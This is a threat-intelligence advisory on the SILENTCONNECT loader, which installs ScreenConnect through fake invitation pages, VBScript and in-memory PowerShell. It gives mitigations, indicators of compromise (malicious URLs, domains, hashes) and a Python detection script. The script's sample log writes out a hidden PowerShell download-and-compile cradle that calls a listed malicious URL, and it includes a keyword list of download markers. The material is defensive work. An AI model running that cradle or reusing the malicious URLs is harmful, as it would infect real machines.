
From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

Medium
Published: Thu Mar 19 2026 (03/19/2026, 11:00:49 UTC)
Source: AlienVault OTX General

Description

A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.

AI-Powered Analysis

Last updated: 03/19/2026, 13:53:42 UTC

Technical Analysis

SILENTCONNECT is a sophisticated malware loader identified in ongoing threat campaigns since March 2025. It primarily functions to silently deploy ScreenConnect, a legitimate remote monitoring and management (RMM) software, onto compromised endpoints. The infection vector begins with a social engineering tactic where victims are redirected to a Cloudflare Turnstile CAPTCHA page masquerading as a digital invitation. When users interact with this page, a VBScript file is downloaded and executed. This VBScript leverages PowerShell to dynamically retrieve and execute C# source code entirely in memory, avoiding writing malicious binaries to disk and thus evading traditional antivirus detection.

SILENTCONNECT incorporates advanced evasion techniques such as Process Environment Block (PEB) masquerading, which manipulates process information to hide its presence, and User Account Control (UAC) bypass to gain elevated privileges without user consent. The campaign abuses trusted cloud hosting services like Google Drive and Cloudflare to host payloads, increasing the likelihood of bypassing network security filters. It also exploits living-off-the-land binaries (LOLBins) to execute malicious code, reducing its footprint and detection risk.

Once ScreenConnect is installed, attackers gain persistent remote access to the victim system, enabling extensive control for espionage, data exfiltration, lateral movement, or deployment of additional malware. The campaign's use of phishing with credible-looking invitations and CAPTCHA challenges increases user interaction and infection success. Indicators of compromise include specific file hashes, IP addresses, and domains such as bumptobabeco.top and imansport.ir. The stealthy nature and effective privilege escalation techniques make SILENTCONNECT a significant threat to organizations relying on Windows environments.

Potential Impact

The deployment of SILENTCONNECT poses a substantial risk to organizations globally by enabling attackers to gain persistent, stealthy remote access via ScreenConnect. This access can lead to unauthorized data exfiltration, intellectual property theft, espionage, and disruption of business operations. The use of legitimate RMM software complicates detection and attribution, as malicious activity may blend with normal administrative tasks. The UAC bypass and in-memory execution techniques increase the likelihood of successful compromise even in environments with endpoint protection solutions. Organizations with remote workforce setups or those using ScreenConnect legitimately may face increased risk of credential theft or lateral movement within their networks. The abuse of trusted cloud services for payload hosting can bypass perimeter defenses, increasing infection rates. Overall, the threat can degrade confidentiality, integrity, and availability of critical systems, potentially causing financial loss, reputational damage, and regulatory consequences.

Mitigation Recommendations

1. Implement strict email and web filtering to block phishing attempts, especially those mimicking invitations or using CAPTCHA pages.
2. Monitor and restrict execution of VBScript and PowerShell scripts, particularly those that download and execute code in memory. Use PowerShell logging and enable script block logging to detect suspicious activity.
3. Employ application control or whitelisting to prevent unauthorized execution of living-off-the-land binaries and unknown scripts.
4. Enforce the principle of least privilege and configure UAC policies to limit privilege escalation opportunities.
5. Monitor network traffic for unusual connections to known malicious domains and IP addresses associated with SILENTCONNECT campaigns.
6. Regularly audit and monitor the use of legitimate RMM tools like ScreenConnect to detect unauthorized installations or anomalous usage patterns.
7. Use endpoint detection and response (EDR) solutions capable of detecting in-memory code execution and PEB masquerading techniques.
8. Educate users to recognize phishing lures and suspicious invitations, emphasizing caution before interacting with unexpected CAPTCHA challenges or download prompts.
9. Maintain up-to-date threat intelligence feeds and indicators of compromise (IOCs) to enhance detection capabilities.
10. Segment networks to limit lateral movement if a system is compromised.
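As an added illustration of recommendations 2, 5, 6 and 9, the following Python script is an example written for this page, not code from AlienVault, Elastic or the OffSeq console. It takes the domains, IP address and file hashes listed in this page's IoC section, matches them against log lines, and also flags the two behaviours the analysis describes: a script host (wscript.exe/cscript.exe) spawning PowerShell, and a PowerShell command line that compiles C# in memory (Add-Type) from downloaded content. The log lines are constructed for the example in a simple "key=value | key=value" layout with Sysmon-like field names; they are not real captures, and the file paths and user name in them are placeholders.

```python
"""Match constructed telemetry against the SILENTCONNECT indicators on this page
and flag the script-host -> PowerShell -> in-memory C# pattern the analysis describes.
Example code written for this page; the IoC values below are copied from its IoC section."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Indicators copied from this page's "Indicators of Compromise" section.
IOC_DOMAINS = {"bumptobabeco.top", "imansport.ir", "solpru.com", "checkfirst.net.au"}
IOC_IPS = {"86.38.225.59"}
IOC_HASHES = {
    "281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3",
    "349e78de0fe66d1616890e835ede0d18580abe8830c549973d7df8a2a7ffdcec",
    "81956d08c8efd2f0e29fd3962bcf9559c73b1591081f14a6297e226958c30d03",
    "8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db",
    "adc1cf894cd35a7d7176ac5dab005bea55516bc9998d0c96223b6c0004723c37",
    "c3d4361939d3f6cf2fe798fef68d4713141c48dce7dd29d3838a5d0c66aa29c7",
    "1b576ebba5b7bbd023eea1b15dac1ed3fb76a211",
}

HASH_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{40}\b", re.I)   # SHA-256 or SHA-1 tokens
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Substrings that indicate PowerShell fetched the source it compiles (case-folded match).
DOWNLOAD_MARKERS = ("downloadstring", "downloaddata", "invoke-webrequest",
                    "invoke-restmethod", "webclient", "iwr ")


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    evidence: str


def parse_fields(line):
    """Split 'k=v | k=v' telemetry into a dict; values may themselves contain '='."""
    fields = {}
    for part in line.split(" | "):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return PureWindowsPath(path).name.lower() if path else ""


def ioc_findings(line_no, line):
    """Domain/IP/hash matches; boundaries stop 'notsolpru.com' or a longer IP matching."""
    found = []
    for dom in sorted(IOC_DOMAINS):
        if re.search(r"(?<![a-z0-9-])" + re.escape(dom) + r"(?![a-z0-9-])", line, re.I):
            found.append(Finding(line_no, "ioc_domain", dom))
    for ip in sorted(IOC_IPS):
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
            found.append(Finding(line_no, "ioc_ip", ip))
    for token in HASH_RE.findall(line):
        if token.lower() in IOC_HASHES:
            found.append(Finding(line_no, "ioc_hash", token.lower()))
    return found


def behaviour_findings(line_no, line):
    """Behavioural rules for the chain the analysis describes (VBScript -> PowerShell -> C# in memory)."""
    f = parse_fields(line)
    found = []
    parent, image = basename(f.get("ParentImage")), basename(f.get("Image"))
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        found.append(Finding(line_no, "script_host_spawns_powershell", f"{parent} -> {image}"))
    cmd = f.get("CommandLine", "").lower()
    if "add-type" in cmd and any(marker in cmd for marker in DOWNLOAD_MARKERS):
        found.append(Finding(line_no, "in_memory_csharp_from_download", "Add-Type fed from a download cradle"))
    return found


def scan(lines):
    findings = []
    for n, line in enumerate(lines, start=1):
        findings.extend(ioc_findings(n, line))
        findings.extend(behaviour_findings(n, line))
    return findings


# Constructed sample telemetry (not real captures; paths and user name are placeholders).
SAMPLE_LOGS = [
    r'ParentImage=C:\Windows\System32\wscript.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r' | CommandLine=powershell.exe -nop -w hidden -c Add-Type -TypeDefinition'
    r' ((New-Object Net.WebClient).DownloadString("http://imansport.ir/download_invitee.php"))',
    r'ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r' | CommandLine=powershell.exe -File C:\scripts\nightly-backup.ps1',
    r'Image=C:\Windows\System32\msiexec.exe | QueryName=bumptobabeco.top | QueryStatus=0',
    r'Image=C:\Windows\System32\msiexec.exe | DestinationIp=86.38.225.59 | DestinationPort=443',
    r'TargetFilename=C:\Users\alice\Downloads\invitation.vbs'
    r' | Hashes=SHA256=281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"line {finding.line_no}: {finding.rule} ({finding.evidence})")
```

Line 2 of the sample (Explorer launching a scheduled backup script) produces no finding, which is the point of pairing IoC matching with behavioural rules: the IoC set goes stale as infrastructure rotates, while the script-host-to-PowerShell and Add-Type-from-download rules describe the technique itself. For production use, feed `scan` with Sysmon event 1/3/22 or PowerShell 4104 script block records and tune `DOWNLOAD_MARKERS` to the cradles seen in the environment.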


Technical Details

Author
AlienVault
Tlp
white
References
https://www.elastic.co/security-labs/silentconnect-delivers-screenconnect
Adversary
null
Pulse Id
69bbd761dff7b64814123d3f
Threat Score
null

Indicators of Compromise

Hash

281226ca0203537fa422b17102047dac314bc0c466ec71b2e6350d75f968f2a3
349e78de0fe66d1616890e835ede0d18580abe8830c549973d7df8a2a7ffdcec
81956d08c8efd2f0e29fd3962bcf9559c73b1591081f14a6297e226958c30d03
8bab731ac2f7d015b81c2002f518fff06ea751a34a711907e80e98cf70b557db
adc1cf894cd35a7d7176ac5dab005bea55516bc9998d0c96223b6c0004723c37
c3d4361939d3f6cf2fe798fef68d4713141c48dce7dd29d3838a5d0c66aa29c7
1b576ebba5b7bbd023eea1b15dac1ed3fb76a211

Ip

86.38.225.59

Url

http://imansport.ir/download_invitee.php
http://solpru.com/process/docusign.html
https://bumptobabeco.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest'

Domain

bumptobabeco.top
imansport.ir
solpru.com
checkfirst.net.au

Threat ID: 69bbfc73e32a4fbe5fc45109

Added to database: 3/19/2026, 1:38:59 PM

Last enriched: 3/19/2026, 1:53:42 PM

Last updated: 3/20/2026, 3:31:17 AM

Views: 45

